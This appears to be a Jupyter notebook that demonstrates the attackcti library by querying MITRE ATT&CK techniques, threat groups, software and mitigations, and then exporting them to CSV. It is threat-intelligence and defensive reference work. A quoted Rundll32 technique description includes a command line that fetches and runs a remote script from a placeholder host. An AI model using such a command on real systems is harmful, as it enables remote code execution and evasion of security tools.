from attackcti import attack_client
from pandas import *
from pandas.io.json import json_normalize
lift = attack_client()
You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive.
technique_name = lift.get_technique_by_name('Rundll32')
technique_name
{'type': 'attack-pattern', 'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', 'created': '2017-05-31 21:31:06.045000+00:00', 'modified': '2018-04-18 17:59:24.739000+00:00', 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], 'url': 'https://attack.mitre.org/wiki/Technique/T1085', 'matrix': 'mitre-attack', 'technique': 'Rundll32', 'technique_description': 'The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nDetection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.\n\nPlatforms: Windows\n\nData Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring\n\nDefense Bypassed: Anti-virus, Application whitelisting\n\nPermissions Required: User\n\nRemote Support: No\n\nContributors: Ricardo Dias, Casey Smith', 'tactic': ['defense-evasion', 'execution'], 'technique_id': 'T1085', 'platform': ['Windows'], 'data_sources': ['File monitoring', 'Binary file metadata', 'Process command-line parameters', 'Process monitoring'], 'defense_bypassed': ['Anti-virus', 'Application whitelisting'], 'permissions_required': ['User'], 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': False, 'contributors': ['Ricardo Dias', 'Casey Smith'], 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1085', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf', 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'], 'detectable_by_common_defenses': None, 'detectable_explanation': None, 'difficulty_for_adversary': None, 'difficulty_explanation': None, 'tactic_type': None}
data_sources = lift.get_all_data_sources()
len(data_sources)
48
data_sources
['browser extensions', 'web application firewall logs', 'named pipes', 'dns records', 'mbr', 'detonation chamber', 'windows error reporting', 'powershell logs', 'asset management', 'web logs', 'ssl/tls inspection', 'access tokens', 'application logs', 'data loss prevention', 'windows registry', 'network device logs', 'binary file metadata', 'anti-virus', 'vbr', 'file monitoring', 'services', 'web proxy', 'digital certificate logs', 'bios', 'malware reverse engineering', 'user interface', 'system calls', 'host network interface', 'efi', 'windows event logs', 'api monitoring', 'network intrusion detection system', 'dll monitoring', 'environment variable', 'packet capture', 'mail server', 'wmi objects', 'netflow/enclave netflow', 'sensor health and status', 'process monitoring', 'network protocol analysis', 'kernel drivers', 'process use of network', 'loaded dlls', 'third-party application logs', 'authentication logs', 'email gateway', 'process command-line parameters']
object_by_id = lift.get_object_by_attack_id('attack-pattern', 'PRE-T1054')
object_by_id
{'type': 'attack-pattern', 'id': 'attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88', 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', 'created': '2017-12-14 16:46:06.044000+00:00', 'modified': '2018-04-18 17:59:24.739000+00:00', 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054', 'matrix': 'mitre-pre-attack', 'technique': 'Acquire OSINT data sets and information', 'technique_description': 'Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)\n\nDetectable by Common Defenses: No\n\nDetectable by Common Defenses explanation: This activity is indistinguishable from legitimate business uses and easy to obtain.\n\nDifficulty for the Adversary: Yes\n\nDifficulty for the Adversary explanation: Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.', 'tactic': ['organizational-information-gathering'], 'technique_id': 'PRE-T1054', 'platform': None, 'data_sources': None, 'defense_bypassed': None, 'permissions_required': None, 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': None, 'contributors': None, 'technique_references': ['https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054', 'SANSThreatProfile', 'Infosec-osint', 'isight-osint'], 'detectable_by_common_defenses': 'No', 'detectable_explanation': 'This activity is indistinguishable from legitimate business uses and easy to obtain.', 'difficulty_for_adversary': 'Yes', 'difficulty_explanation': 'Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.', 'tactic_type': None}
You can get any Group by its Alias property across all the matrices. It is case sensitive.
group_name = lift.get_group_by_alias('Cozy Bear')
group_name
{'type': 'intrusion-set', 'id': 'intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', 'matrix': 'mitre-attack', 'created': '2017-05-31 21:31:52.748000+00:00', 'modified': '2018-04-18 17:59:24.739000+00:00', 'url': 'https://attack.mitre.org/wiki/Group/G0016', 'group': 'APT29', 'group_description': 'APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)', 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'], 'group_id': 'G0016', 'group_references': ['https://attack.mitre.org/wiki/Group/G0016', 'https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf', 'GRIZZLY STEPPE JAR', 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/']}
relationships = lift.get_relationships_by_object('software')
relationships[0]
{'target_object': 'attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e', 'relationship_description': 'Cobalt Strike uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.', 'software_type': 'tool', 'matrix': 'mitre-attack', 'software': 'Cobalt Strike', 'software_description': 'Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)\n\nIn addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. (Citation: cobaltstrike manual)\n\nAliases: Cobalt Strike\n\nContributors: Josh Abraham', 'software_labels': ['tool'], 'software_id': 'S0154', 'url': 'https://attack.mitre.org/wiki/Software/S0154', 'software_aliases': ['Cobalt Strike'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0154', 'https://cobaltstrike.com/downloads/csmanual38.pdf']}
The difference with this function and get_all_techniques() is that get_all_techniques_with_mitigations returns (of course haha) mitigations mapped to their respective techniques. This is useful for when you want to gather mitigations and techniques all at once.
complete_techniques = lift.get_all_techniques_with_mitigations()
complete_techniques[0]
{'matrix': 'mitre-attack', 'mitigation': '.bash_profile and .bashrc Mitigation', 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.', 'mitigation_id': 'T1156', 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'], 'technique': '.bash_profile and .bashrc', 'technique_description': "<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed.\n\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.\n\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\n\nDetection: While users may customize their <code>~/.bashrc</code> and <code>~/.bash_profile</code> files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nPlatforms: Linux, macOS\n\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\n\nPermissions Required: User, Administrator", 'tactic': ['persistence'], 'url': 'https://attack.mitre.org/wiki/Technique/T1156', 'technique_id': 'T1156', 'platform': ['Linux', 'macOS'], 'data_sources': ['File monitoring', 'Process Monitoring', 'Process command-line parameters', 'Process use of network'], 'defense_bypassed': None, 'permissions_required': ['User', 'Administrator'], 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': None, 'contributors': None, 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156', 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'], 'detectable_by_common_defenses': None, 'detectable_explanation': None, 'difficulty_for_adversary': None, 'difficulty_explanation': None, 'tactic_type': None}
If you do not provide the name of a specific Software (Case Sensitive), the function returns information about every piece of software across all the matrices.
software_techniques = lift.get_techniques_used_by_software('BITSAdmin')
software_techniques[0]
{'matrix': 'mitre-attack', 'relationship_description': 'can be used to create BITS Jobs to upload and/or download files.', 'software': 'BITSAdmin', 'software_description': 'is a command line tool used to create and manage BITS Jobs. (Citation: Microsoft BITSAdmin)\n\nAliases: BITSAdmin', 'software_labels': ['tool'], 'software_id': 'S0190', 'software_aliases': ['BITSAdmin'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0190', 'https://msdn.microsoft.com/library/aa362813.aspx'], 'technique': 'Remote File Copy', 'technique_description': 'Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.\n\nDetection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring\n\nPermissions Required: User\n\nRequires Network: Yes', 'tactic': ['command-and-control', 'lateral-movement'], 'technique_id': 'T1105', 'url': 'https://attack.mitre.org/wiki/Technique/T1105'}
If you do not provide the name of a specific Group (Case Sensitive), the function returns information about all the groups available across all the matrices.
group_techniques = lift.get_techniques_used_by_group('APT12')
group_techniques[0]
{'matrix': 'mitre-pre-attack', 'relationship_description': None, 'group': 'APT12', 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)', 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'], 'group_id': 'G0005', 'group_references': ['https://attack.mitre.org/wiki/Group/G0005', 'http://www.crowdstrike.com/blog/whois-numbered-panda/'], 'technique': 'Determine strategic target', 'technique_description': 'An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 (R)) (Citation: DoD Cyber 2015)\n\nDetectable by Common Defenses: No\n\nDetectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.\n\nDifficulty for the Adversary: Yes\n\nDifficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.', 'tactic': ['target-selection'], 'technique_id': 'PRE-T1018', 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1018'}
If you do not provide the name of a specific Group, it returns information about all the groups available across all the matrices.
group_software = lift.get_software_used_by_group('APT12')
group_software[0]
{'matrix': 'mitre-attack', 'relationship_description': None, 'group': 'APT12', 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)', 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'], 'group_id': 'G0005', 'group_references': ['https://attack.mitre.org/wiki/Group/G0005', 'http://www.crowdstrike.com/blog/whois-numbered-panda/'], 'software url': 'https://attack.mitre.org/wiki/Software/S0015', 'software': 'Ixeshe', 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)\n\nAliases: Ixeshe', 'software_labels': ['malware'], 'software_id': 'S0015', 'software_aliases': ['Ixeshe'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0015', 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'], 'technique': 'Data Obfuscation', 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\n\nRequires Network: Yes', 'tactic': ['command-and-control'], 'technique_id': 'T1001'}
all_used_by_group = lift.get_all_used_by_group('APT12')
all_used_by_group[0]
{'matrix': 'mitre-attack', 'relationship_description': None, 'group': 'APT12', 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)', 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'], 'group_id': 'G0005', 'group_references': ['https://attack.mitre.org/wiki/Group/G0005', 'http://www.crowdstrike.com/blog/whois-numbered-panda/'], 'software url': 'https://attack.mitre.org/wiki/Software/S0015', 'software': 'Ixeshe', 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)\n\nAliases: Ixeshe', 'software_labels': ['malware'], 'software_id': 'S0015', 'software_aliases': ['Ixeshe'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0015', 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'], 'technique': 'Data Obfuscation', 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\n\nRequires Network: Yes', 'tactic': ['command-and-control'], 'technique_id': 'T1001'}
%time all_attack_framework = lift.get_all_attack()
CPU times: user 13.9 s, sys: 280 ms, total: 14.2 s Wall time: 41.3 s
type(all_attack_framework)
list
all_attack_framework[0]
{'matrix': 'mitre-attack', 'mitigation': '.bash_profile and .bashrc Mitigation', 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.', 'mitigation_id': 'T1156', 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'], 'technique': '.bash_profile and .bashrc', 'technique_description': "<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed.\n\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.\n\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\n\nDetection: While users may customize their <code>~/.bashrc</code> and <code>~/.bash_profile</code> files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nPlatforms: Linux, macOS\n\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\n\nPermissions Required: User, Administrator", 'tactic': ['persistence'], 'url': 'https://attack.mitre.org/wiki/Technique/T1156', 'technique_id': 'T1156', 'platform': ['Linux', 'macOS'], 'data_sources': ['File monitoring', 'Process Monitoring', 'Process command-line parameters', 'Process use of network'], 'defense_bypassed': None, 'permissions_required': ['User', 'Administrator'], 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': None, 'contributors': None, 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156', 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'], 'detectable_by_common_defenses': None, 'detectable_explanation': None, 'difficulty_for_adversary': None, 'difficulty_explanation': None, 'tactic_type': None}
Showing schema of the results
df = json_normalize(all_attack_framework)
list(df)
['contributors', 'data_sources', 'defense_bypassed', 'detectable_by_common_defenses', 'detectable_explanation', 'difficulty_explanation', 'difficulty_for_adversary', 'effective_permissions', 'group', 'group_aliases', 'group_description', 'group_id', 'group_references', 'matrix', 'mitigation', 'mitigation_description', 'mitigation_id', 'mitigation_references', 'network_requirements', 'permissions_required', 'platform', 'relationship_description', 'remote_support', 'software', 'software url', 'software_aliases', 'software_description', 'software_id', 'software_labels', 'software_references', 'system_requirements', 'tactic', 'tactic_type', 'technique', 'technique_description', 'technique_id', 'technique_references', 'url']
df = df[[
'matrix','tactic','technique','technique_id','technique_description',
'mitigation','mitigation_description','group','group_id','group_aliases',
'group_description','software','software_id','software_description','software_labels',
'relationship_description','platform','data_sources','detectable_by_common_defenses','detectable_explanation',
'difficulty_for_adversary','difficulty_explanation','effective_permissions','network_requirements','permissions_required',
'remote_support','system_requirements','contributors','url']]
df.to_csv('all_attack.csv',index=False,encoding='utf-8')